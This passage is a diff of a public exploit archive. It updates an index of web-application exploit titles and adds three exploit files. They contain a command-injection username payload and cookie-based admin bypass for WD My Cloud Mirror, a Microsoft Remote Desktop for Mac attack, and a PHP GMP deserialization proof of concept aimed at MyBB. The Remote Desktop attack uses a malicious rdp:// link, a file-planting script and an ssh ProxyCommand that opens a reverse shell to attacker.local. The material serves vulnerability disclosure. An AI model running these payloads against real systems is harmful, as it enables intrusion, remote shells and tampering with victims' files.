Team",php,webapps,80 35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 -35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 +35565,platforms/php/webapps/35565.txt,"Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection",2014-12-04,"Robert Cooper",cgi,webapps,80 35467,platforms/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 @@ -34215,7 +34218,7 @@ id,file,description,date,author,platform,type,port 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - (browse.php category Parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 +35591,platforms/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php category Parameter' SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 @@ -34465,7 +34468,7 @@ id,file,description,date,author,platform,type,port 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 36023,platforms/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 -36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0 +36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps,0 36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,php,webapps,0 36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,php,webapps,0 36029,platforms/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0 @@ -35083,7 +35086,7 @@ id,file,description,date,author,platform,type,port 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM Websphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 -36942,platforms/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 +36942,platforms/php/webapps/36942.txt,"WordPress Plugin Freshmail 1.5.8 - 'shortcode.php' SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search - Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 @@ -35103,7 +35106,7 @@ id,file,description,date,author,platform,type,port 36974,platforms/cgi/webapps/36974.txt,"WebGlimpse 2.14.1/2.18.8 - 'webglimpse.cgi' Remote Command Injection",2012-03-20,"Kevin Perry",cgi,webapps,0 36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' Parameter SQL Injection",2012-03-19,r45c4l,php,webapps,0 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 -36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 +36977,platforms/php/webapps/36977.pl,"CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 @@ -35122,7 +35125,7 @@ id,file,description,date,author,platform,type,port 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 -37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 +37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - 'deletetopics.php' SQL Injection",2015-05-13,Wadeek,php,webapps,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 37010,platforms/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting",2012-03-25,Crim3R,php,webapps,0 @@ -35285,7 +35288,7 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 @@ -35347,10 +35350,10 @@ id,file,description,date,author,platform,type,port 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - Authentication Bypass",2015-06-15,"walid naceri",php,webapps,0 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 - Multiple SQL Injections / Local File Inclusion",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 - Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 -37331,platforms/php/webapps/37331.py,"WHMCS - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 +37331,platforms/php/webapps/37331.py,"WHMCompleteSolution (WHMCS) - 'boleto_bb.php' SQL Injection",2012-05-29,dex,php,webapps,0 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery",2015-06-16,"Jerold Hoong",php,webapps,0 37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 -37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 +37318,platforms/php/webapps/37318.txt,"phpList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 37321,platforms/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 @@ -35362,7 +35365,7 @@ id,file,description,date,author,platform,type,port 37356,platforms/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 37357,platforms/php/webapps/37357.php,"WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)",2012-05-31,"Shadman Tanjim",php,webapps,0 -37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution - (WHMCS) 5.0 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 +37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 @@ -35444,7 +35447,7 @@ id,file,description,date,author,platform,type,port 37453,platforms/php/webapps/37453.php,"Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 -37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 +37457,platforms/php/webapps/37457.html,"FCKEditor Core - 'Editor 'spellchecker.php'' Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 37459,platforms/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",php,webapps,0 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,php,webapps,0 37461,platforms/php/webapps/37461.txt,"DigPHP - 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps,0 @@ -35548,7 +35551,7 @@ id,file,description,date,author,platform,type,port 37622,platforms/php/webapps/37622.txt,"WordPress Plugin Download Manager Free 2.7.94 & Pro 4 - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 -37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37613,platforms/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 @@ -35721,7 +35724,7 @@ id,file,description,date,author,platform,type,port 37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,php,webapps,0 37970,platforms/php/webapps/37970.html,"WordPress Plugin Wordfence Security - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 -37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 +37971,platforms/php/webapps/37971.html,"WHMCompleteSolution (WHMCS) 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 37973,platforms/php/webapps/37973.txt,"SMF - 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 37974,platforms/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injection",2012-10-26,G13,php,webapps,0 37977,platforms/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",xml,webapps,0 @@ -35733,7 +35736,7 @@ id,file,description,date,author,platform,type,port 37992,platforms/php/webapps/37992.txt,"CorePlayer - 'callback' Parameter Cross-Site Scripting",2012-10-28,MustLive,php,webapps,0 37993,platforms/php/webapps/37993.txt,"Joomla! Component 'com_quiz' - SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0 37994,platforms/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 -37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager - (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 +37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) - 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 37998,platforms/php/webapps/37998.txt,"WordPress Plugin Responsive Thumbnail Slider 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80 @@ -36731,7 +36734,7 @@ id,file,description,date,author,platform,type,port 40149,platforms/php/webapps/40149.rb,"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 -40154,platforms/php/webapps/40154.txt,"PHP gettext 1.0.12 - (gettext.php) Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 +40154,platforms/php/webapps/40154.txt,"PHP gettext 1.0.12 - 'gettext.php' Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 40156,platforms/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 40157,platforms/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",cgi,webapps,80 40158,platforms/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 @@ -36945,7 +36948,7 @@ id,file,description,date,author,platform,type,port 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 -40932,platforms/php/webapps/40932.txt,"WHMCS Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80 +40932,platforms/php/webapps/40932.txt,"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,php,webapps,80 40934,platforms/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,php,webapps,80 40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 @@ -37079,3 +37082,5 @@ id,file,description,date,author,platform,type,port 41140,platforms/php/webapps/41140.txt,"B2B Alibaba Clone Script - SQL Injection",2017-01-20,"Ihsan Sencan",php,webapps,0 41141,platforms/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,linux,webapps,0 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0 +41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0 +41150,platforms/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",php,webapps,80 diff --git a/platforms/hardware/webapps/41147.txt b/platforms/hardware/webapps/41147.txt new file mode 100755 index 000000000..7c80adbe1 --- /dev/null +++ b/platforms/hardware/webapps/41147.txt @@ -0,0 +1,27 @@ +# Exploit Title: WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass +# Date: 24.01.2017 +# Software Link: https://www.wdc.com +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: local + +1. Description + +It’s possible to execute arbitrary commands using login form because `exec()` function is used without `escapeshellarg()`. + +It's possible to bypass login form because function only check if `$_COOKIE['username']` and `$_COOKIE['isAdmin']` exist. + +https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html + +2. Proof of Concept + +For RCE simply use as username: + +a" || your_command_to_execute || " + +For authentication bypass set COOKIES: + +username=1; isAdmin=1 + +and then visit for example php/users.php \ No newline at end of file diff --git a/platforms/osx/local/41149.txt b/platforms/osx/local/41149.txt new file mode 100755 index 000000000..973d28d0f --- /dev/null +++ b/platforms/osx/local/41149.txt @@ -0,0 +1,104 @@ +## Description +A vulnerability exists in Microsoft Remote Desktop for Mac that allows a remote attacker to execute arbitrary code on the target machine. +User interaction is needed to exploit this issue, but a single click on a link (sent via mail, iMessage, etc.) is sufficient to trigger the vulnerability. + +## Details +Microsoft Remote Desktop Client for Mac OS X (ver 8.0.32 and probably prior) allows a malicious Terminal Server to read and write any file in the home directory of the connecting user. +The vulnerability exists to the way the application handles rdp urls. In the rdp url schema it's possible to specify a parameter that will make the user's home directory accessible to the server without any warning or confirmation request. If an attacker can trick a user to open a malicious rdp url, he/she can read and write any file within the victim's home directory. + +Since Mac OS X by default opens rdp urls without confirmation (for example via Safari, Mail, Messages), a single click on a link it's sufficient to trigger the vulnerability. + +According to Microsoft, no CVE will be assigned due to the release model of this particular client. + +A demo video is available at https://youtu.be/6HeSiXYRpNY. + +## Proof Of Concept +The following Proof Of Concept creates a directory on the victim's home and puts a file into it. +To reproduce the issue follow the steps below: + +- install a windows 2008 server and allow Administrator to connect without password +- login as Administrator +- configure a trusted ssl certificate for rdp connections +- install python2.7 and put the following script in the "Startup" folder +- logout +- send the link below to a victim +RDC link: + +``` +rdp://full%20address=s:attacker.local&desktopwidth=i:200&desktopheight=i:200&audiomode=i:2&disable%20themes=i:1&screen%20mode%20id=i:1&devicestoredirect:s:*&drivestoredirect=s:*&redirectprinters=i:1&username=s:Administrator +``` + + +### Python script + +``` +#BOF +import sys +import subprocess +import time +import os + +def runcmd(cmd): + err = None + out = None + try: + process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE); + out, err = process.communicate() + except Exception as e: + print str(e) + + return out + + +while(True): + netuse = runcmd("net use") + if netuse.find("TSCLIENT"): + runcmd('MKLINK /D C:\\home \\\\tsclient\\home') + + runcmd('md c:\\home\\REMOTE') + + runcmd('copy c:\\REMOTE.txt c:\\home\\REMOTE\\REMOTE.txt') + + runcmd("shutdown /l /f") + break + + time.sleep(0.4) +#EOF +``` + +## Remote Code Execution +To execute arbitrary code on the target machine we can use a trick that involves ssh and ssh:// URI handler. +Consider the following example where the RDC exploit pushes the following files on the remote machine: + +- `~/.ssh/known_hosts` +``` +p ssh-rsa AAAAB3NzaC1yc2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +``` +- `~/.ssh/config` +``` +Host p +HostName p +ProxyCommand /bin/bash ~/.ssh/command.sh +``` +- `~/.ssh/command.sh` +``` +for a in {1..31}; do trap "" $a; done +nohup bash -i >& /dev/tcp/attacker.local/1234 0 & +``` + +At this point any attempt to launch ssh://p will lead to the execution of ~/.ssh/command.sh without any warning. To automatically execute the triggering URL (ssh://p) we can either: + +- send the link to the victim via Mail or iMessage +- poison Safari cache adding some javascript that launches the URL +- poison Safari "Application Saved State" so that the URL il launched at browser execuition +- poison "loginitems" to launch the URL at system startup + +It's also possible achieve Remote Code Execution by sending a single link to the victim if he/she uses Safari as the default browser. + +## Update +On Jan 17 2017 Apple pushed a security uptate to Safari that prevents this exploit from working. +This fix is mentioned in the Apple Store: +This update fixes an issue where a website could repeately attempt to launch other websites or applications + +## Solution +Update Microsoft RDC to the latest version. The version 8.0.37 fixes this issue. \ No newline at end of file diff --git a/platforms/php/webapps/41150.txt b/platforms/php/webapps/41150.txt new file mode 100755 index 000000000..4c883e115 --- /dev/null +++ b/platforms/php/webapps/41150.txt @@ -0,0 +1,219 @@ +#GMP Deserialization Type Confusion Vulnerability [MyBB <= 1.8.3 RCE Vulnerability] + +Taoguang Chen <[@chtg57](https://twitter.com/chtg57)> - Write Date: 2015.4.28 - Release Date: 2017.1.20 + +> A type-confusion vulnerability was discovered in GMP deserialization with crafted object's __wakeup() magic method that can be abused for updating any already assigned properties of any already created objects, this result in serious security issues. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.30 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ +gmp.c +``` +static int gmp_unserialize(zval **object, zend_class_entry *ce, const unsigned char *buf, zend_uint buf_len, zend_unserialize_data *data TSRMLS_DC) /* {{{ */ +{ + ... + ALLOC_INIT_ZVAL(zv_ptr); + if (!php_var_unserialize(&zv_ptr, &p, max, &unserialize_data TSRMLS_CC) + || Z_TYPE_P(zv_ptr) != IS_ARRAY + ) { + zend_throw_exception(NULL, "Could not unserialize properties", 0 TSRMLS_CC); + goto exit; + } + + if (zend_hash_num_elements(Z_ARRVAL_P(zv_ptr)) != 0) { + zend_hash_copy( + zend_std_get_properties(*object TSRMLS_CC), Z_ARRVAL_P(zv_ptr), + (copy_ctor_func_t) zval_add_ref, NULL, sizeof(zval *) + ); + } +``` + +zend_object_handlers.c +``` +ZEND_API HashTable *zend_std_get_properties(zval *object TSRMLS_DC) /* {{{ */ +{ + zend_object *zobj; + zobj = Z_OBJ_P(object); + if (!zobj->properties) { + rebuild_object_properties(zobj); + } + return zobj->properties; +} +``` + +It has been demonstrated many times before that __wakeup() or other magic methods leads to `ZVAL` was changed from the memory in during deserializtion. So an attacker can change `**object` into an integer-type or bool-type `ZVAL`, then the attacker will be able to access any objects that stored in objects store via `Z_OBJ_P`. This means the attacker will be able to update any properties in the object via zend_hash_copy(). It is possible to lead to various problems and including security issues. + +The following codes will prove this vulnerability: +``` +ryat = 1; + } +} + +$obj = new stdClass; +$obj->aa = 1; +$obj->bb = 2; + +$inner = 's:1:"1";a:3:{s:2:"aa";s:2:"hi";s:2:"bb";s:2:"hi";i:0;O:3:"obj":1:{s:4:"ryat";R:2;}}'; +$exploit = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}'; +$x = unserialize($exploit); +var_dump($obj); + +?> +``` + +Expected result: +``` +object(stdClass)#1 (2) { + ["aa"]=> + int(1) + ["bb"]=> + int(2) +} +``` + +Actual result: +``` +object(stdClass)#1 (3) { + ["aa"]=> + string(2) "hi" + ["bb"]=> + string(2) "hi" + [0]=> + object(obj)#3 (1) { + ["ryat"]=> + &int(1) + } +} +``` + +**i) How to exploited this bug in real world?** + +When PHP 5.6 <= 5.6.11, DateInterval's __wakeup() use convert_to_long() handles and reassignments its properties (it has been demonstrated many times), so an attacker can convert GMP object to an any integer-type `ZVAL` via GMP's gmp_cast_object(): + +``` +static int gmp_cast_object(zval *readobj, zval *writeobj, int type TSRMLS_DC) /* {{{ */ +{ + mpz_ptr gmpnum; + switch (type) { + ... + case IS_LONG: + gmpnum = GET_GMP_FROM_ZVAL(readobj); + INIT_PZVAL(writeobj); + ZVAL_LONG(writeobj, mpz_get_si(gmpnum)); + return SUCCESS; +``` + +The following codes will prove this exploite way: +``` + +``` +Of course, a crafted __wakeup() can also be exploited, ex: + +``` +ryat = (int) $this->ryat; +} + +?> +``` + +**ii) Can be exploited this bug in real app?** + +Exploited the bug in MyBB: + +index.php +``` + if(isset($mybb->cookies['mybb']['forumread'])) + { + $forumsread = my_unserialize($mybb->cookies['mybb']['forumread']); + } +``` + +MyBB <= 1.8.3 allow deserialized cookies via unserialize(), so an attacker will be able to update `$mybb` or other object's any properties, and it is possible to lead to security issues easily, ex: xss, sql injection, remote code execution and etc. :-) + +**P.S. I had reported this vulnerability and it had been fixed in mybb >= 1.8.4.** + +Proof of Concept Exploit +------------ +**MyBB <= 1.8.3 RCE vulnerability** + +index.php +``` +eval('$index = "'.$templates->get('index').'";'); +``` + +MyBB always use eval() function in during template parsing. + +inc/class_templates.php +``` +class templates +{ + ... + public $cache = array(); + ... + function get($title, $eslashes=1, $htmlcomments=1) + { + global $db, $theme, $mybb; + ... + $template = $this->cache[$title]; + ... + return $template; + } +``` + +If we can control the 